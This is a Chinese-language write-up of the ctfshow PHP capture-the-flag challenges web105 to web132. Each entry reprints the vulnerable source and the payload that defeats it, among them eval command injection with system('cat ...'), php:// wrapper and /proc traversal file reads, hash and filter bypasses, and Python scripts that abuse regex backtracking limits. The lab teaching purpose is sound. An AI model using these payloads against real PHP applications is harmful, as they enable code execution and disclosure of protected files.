目錄
web105
web106
web107
web108
web109
web110
web111
web112
web113
web114
web115
web123
web125
web126
web127
web128
web129
web130
web131
web132
web105
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:34:07
?
*/
?
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你還想要flag嘛?';
$suces='既然你想要那給你吧!';
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}
$$key=$$value;
}foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}
$$key=$$value;
}
if(!($_POST['flag']==$flag)){
die($error);
}
echo "your are good".$flag."\n";
die($suces);
?
?>
你還想要flag嘛?
hint中的解法
GET:?suces=flag POST:error=suces
首先一段一段的看代碼
第一段
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}
$$key=$$value;
}
說的是,我們GET傳參,傳入的值不能為error
第二段
foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}
$$key=$$value;
}
post傳入引數,傳入的值不能為flag
第三段
if(!($_POST['flag']==$flag)){
die($error);
}
POST傳入的值不為變數flag,則輸出變數error
GET:?a=flag
POST:error=a
先將flag的值賦給a,然后再賦值給error,利用die()函式輸出
web106
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:38:27
?
*/
?
?
highlight_file(__FILE__);
include("flag.php");
?
if(isset($_POST['v1']) && isset($_GET['v2'])){
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
if(sha1($v1)==sha1($v2) && $v1!=$v2){
echo $flag;
}
}
?
?
?
?>
陣列繞過就可
GET:?v2[]=1
POST:v1[]=2
web107
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 23:24:14
?
*/
?
?
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
?
if(isset($_POST['v1'])){
$v1 = $_POST['v1'];
$v3 = $_GET['v3'];
parse_str($v1,$v2);
if($v2['flag']==md5($v3)){
echo $flag;
}
?
}
?
?
?
?>
parse_str()函式
parse_str(string,array)
把查詢字串決議到變數中,
string必選,規定要決議的字串
array可選,規定存盤變數的陣列的名稱,
很明顯,題目要將v1的值賦給v2,然后v3的md5等于v2輸出flag
payload:
GET:?v3=a //a可以為任意字符
POST:v1=flag=0cc175b9c0f1b6a831c399e269772661 //a的md5值
md5無法決議陣列
GET:?v3[]=1
POST:v1="flag=0"
web108
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 23:53:55
?
*/
?
?
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
?
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE) {
die('error');
?
}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
echo $flag;
}
?
?>
ereg函式為匹配函式
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE) {
die('error');
?
}
GET引數c要只能為字母,否則die函式
函式在NULL截斷漏洞,導致了正則過濾被繞過,所以可以使用%00截斷正則匹配
后一段
if(intval(strrev($_GET['c']))==0x36d){
echo $flag;
}
strrev函式
函式反轉字串
正常的話,想要形成的
877%00a
再進行反轉,a正好匹配了ereg函式
a%00778
web109
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-29 22:02:34
?
*/
?
?
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
?
if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
eval("echo new $v1($v2());");
}
?
}
?
?>
可以直接構造反射類
?v1=ReflectionClass&v2=system("ls")
?v1=ReflectionClass&v2=system("cat fl36dg.txt")
或
?v1=Exception&v2=system('cat fl36dg.txt')
web110
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-29 22:49:10
?
*/
?
?
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
?
if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){
die("error v1");
}
if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){
die("error v2");
}
?
eval("echo new $v1($v2());");
?
}
?
?>
payload
?v1=FilesystemIterator&v2=getcwd
原理:
FilesystemIterator
獲取指定目錄下的所有檔案
getcwd()函式
獲取當前作業目錄,回傳當前目錄
web111
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 02:41:40
?
*/
?
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
?
function getFlag(&$v1,&$v2){
eval("$$v1 = &$$v2;");
var_dump($$v1);
}
?
?
if(isset($_GET['v1']) && isset($_GET['v2'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
?
if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){
die("error v1");
}
if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){
die("error v2");
}
if(preg_match('/ctfshow/', $v1)){
getFlag($v1,$v2);
}
?
?
?
}
?
?>
這個地方用到了全域變數
$GLOBALS
payload:
?v1=ctfshow&v2=GLOBALS
因為要執行這一段函式,所有v1要為ctfshow
if(preg_match('/ctfshow/', $v1)){
getFlag($v1,$v2);
}
然后再將v2的值賦給v1,再接著getFlag函式,列印v1,v1為全域變數的時候,即可列印出flag
web112
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 23:47:49
?
*/
?
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){
die("hacker!");
}else{
return $file;
}
}
$file=$_GET['file'];
if(! is_file($file)){
highlight_file(filter($file));
}else{
echo "hacker!";
}
直接用偽協議讀就可,但是要注意base64被禁了
?file=php://filter/resource=flag.php
hint上的其他方法
php://filter/resource=flag.php
php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php
php://filter/read=convert.quoted-printable-encode/resource=flag.php
compress.zlib://flag.php
web113
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 23:47:52
?
*/
?
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
die('hacker!');
}else{
return $file;
}
}
$file=$_GET['file'];
if(! is_file($file)){
highlight_file(filter($file));
}else{
echo "hacker!";
}
禁的東西好多了,可以使用上一題的一個payload
compress.zlib://flag.php
也可使用預期解
?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p
roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro
c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/
self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se
lf/root/proc/self/root/var/www/html/flag.php
web114
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:02:53
?
*/
?
error_reporting(0);
highlight_file(__FILE__);
function filter($file){
if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
die('hacker!');
}else{
return $file;
}
}
$file=$_GET['file'];
echo "師傅們居然tql都是非預期 哼!";
if(! is_file($file)){
highlight_file(filter($file));
}else{
echo "hacker!";
} 師傅們居然tql都是非預期 哼!
這個題compress,和非預期都被禁了,但是偽協議放出來了,可以直接使用偽協議讀
?file=php://filter/resource=flag.php
web115
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:08:19
?
*/
?
include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){
$num=str_replace("0x","1",$num);
$num=str_replace("0","1",$num);
$num=str_replace(".","1",$num);
$num=str_replace("e","1",$num);
$num=str_replace("+","1",$num);
return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
if($num=='36'){
echo $flag;
}else{
echo "hacker!!";
}
}else{
echo "hacker!!!";
} hacker!!!
考察的內容:
trim函式的繞過+is_numeric繞過
語法:
trim(string,charlist)
?
string 必需:規定檢查的字串
charlist 可選規定從字串中洗掉哪些字符,如果省略該引數,則移除下列所有字符:
"\0" - NULL
"\t" - 制表符
"\n" - 換行
"\x0B" - 垂直制表符
"\r" - 回車
" " - 空格
做個測驗
<?php
for ($i=0; $i <=128 ; $i++) {
$x=chr($i).'1';
if(trim($x)!=='1' && is_numeric($x)){
echo urlencode(chr($i))."\n";
}
}
?>
可以用到只要%0c(換頁符)了
payload:
num=%0c36
web123
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
eval("$c".";");
if($fl0g==="flag_give_me"){
echo $flag;
}
}
}
?>
一個難點
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
PHP變數名由數字字母下劃線組成,是沒有.的
注:
GET或POST的方式傳進去的變數名,會自動將空格 + . [ 轉換為_
payoload:
POST:CTF_SHOW=&CTF[SHOW.COM=&fun=echo $flag
web125
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){
eval("$c".";");
if($fl0g==="flag_give_me"){
echo $flag;
}
}
}
?>
payload
GET:?1=flag.php
POST:CTF_SHOW=&CTF[SHOW.COM=&fun=highlight_file($_GET[1])
web126
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i", $c) && strlen($c)<=16){
eval("$c".";");
if($fl0g==="flag_give_me"){
echo $flag;
}
}
}
payload
get: a=1+fl0g=flag_give_me
post: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])
web127
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-10 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-10 21:52:49
?
*/
?
?
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$ctf_show = md5($flag);
$url = $_SERVER['QUERY_STRING'];
?
?
//特殊字符檢測
function waf($url){
if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $url)){
return true;
}else{
return false;
}
}
?
if(waf($url)){
die("嗯哼?");
}else{
extract($_GET);
}
?
?
if($ctf_show==='ilove36d'){
echo $flag;
}
過濾掉了_,繞過的方式還是同web123
payload
?ctf show=ilove36d
web128
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-10 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-12 19:49:05
?
*/
?
?
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
?
$f1 = $_GET['f1'];
$f2 = $_GET['f2'];
?
if(check($f1)){
var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
echo "嗯哼?";
}
?
?
?
function check($str){
return !preg_match('/[0-9]|[a-z]/i', $str);
}
call_user_func函式
call_user_func — 把第一個引數作為回呼函式呼叫
gettext函式
在開啟該拓展后_()等效于gettext()
?
<?php
echo gettext("phpinfo");
結構 phpinfo
?
echo _("phpinfo")
結構phpinfo
call_user_func('_','phpinfo')相當于gettext("phpinfo")
get_defined_vars
函式回傳由所有已定義變數所組成的陣列,
payload
?f1=_&f2=get_defined_vars
web129
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 03:18:40
?
*/
?
?
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['f'])){
$f = $_GET['f'];
if(stripos($f, 'ctfshow')>0){
echo readfile($f);
}
}
stripos函式
stripos(string,find,start)
回傳值:回傳字串在另一字串中第一次出現的位置,如果沒有找到字串則回傳FALSE,注釋:字串位置從0開始,不是從1開始
get傳參f,如果f中有ctfshow,則執行readfile函式
payload:
?f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php
?f=php://filter/|ctfshow/resource=flag.php
?f=/ctfshow/../../../../var/www/html/flag.php
?f=./ctfshow/../flag.php
web130
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 05:19:40
?
*/
?
?
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
$f = $_POST['f'];
?
if(preg_match('/.+?ctfshow/is', $f)){
die('bye!');
}
if(stripos($f, 'ctfshow') === FALSE){
die('bye!!');
}
?
echo $flag;
?
}
正則最大回溯次數繞過
PHP中,為了防止一次正則匹配呼叫的匹配程序過大從而造成過多的資源消耗,限定了一次正則匹配中呼叫匹配函式的次數, 回溯主要有兩種 貪婪模式下,pattern部分被匹配,但是后半部分沒匹配(匹配“用力過猛”,把后面的部分也匹配過了)時匹配式回退的操作,在出現*、+時容易產生, 非貪婪模式下,字串部分被匹配,但后半部分沒匹配完全(匹配“用力不夠”,需要通配符再匹配一定的長度),在出現*?、+?時容易產生
py腳本
import requests
url="http://07b28eb7-15d4-4250-be72-33a58b73dba1.chall.ctf.show/"
data={
'f':'very'*250000+'ctfshow'
}
r=requests.post(url,data=data)
print(r.text)
if(preg_match('/.+?ctfshow/is', $f)){
die('bye!');
}
.表示任意單個字符,+表示必須匹配1次或多次,所有在ctfshow前面必須有至少一個字符才會回傳True
還有
payload:
f=ctfshow
f[]=a
web131
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 05:19:40
?
*/
?
?
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
$f = (String)$_POST['f'];
?
if(preg_match('/.+?ctfshow/is', $f)){
die('bye!');
}
if(stripos($f,'36Dctfshow') === FALSE){
die('bye!!');
}
?
echo $flag;
?
}
內容基本同上一題,但是我還是沒有做出來,看了別人的腳本,出來了
腳本奉上
import requests
?
if __name__ == '__main__':
?
url = 'http://2e7bb354-4be0-4a62-b864-6bd69a4a58b1.challenge.ctf.show:8080/'
high = 1000000
low = 100000
while True:
mid = int((high + low) / 2)
data = {
'f': 'haha' * mid + '36Dctfshow'
}
r = requests.post(url=url, data=data)
if 'ctfshow{' in r.text:
print(r.text)
break
elif 'Too Large' in r.text:
high = mid
elif 'bye' in r.text:
low = mid
web132
打開題目是一個頁面,robots.txt,發現有一個/admin路徑,但是單純打/admin路徑是報404的,在后面再加上index.php
可以找到原始碼
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 06:22:13
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 20:05:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
#error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
?
?
if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
$username = (String)$_GET['username'];
$password = (String)$_GET['password'];
$code = (String)$_GET['code'];
?
if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
if($code == 'admin'){
echo $flag;
}
}
}
這一題的主要的地方就在if陳述句那
if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin")
mt_rand()函式
用于生成亂數
經過判斷
<?php
if(false && false || true){
echo 123
}
注:
對于“與”(&&) 運算: x && y 當x為false時,直接跳過,不執行y; 對于“或”(||) 運算 : x||y 當x為true時,直接跳過,不執行y
if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin")
第一個$code === mt_rand(1,0x36D)為false,之后就執行|| $username ==="admin"#成功繞過
所以payload:
?code=admin&passwodr=1&username=admin
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/299606.html
標籤:其他
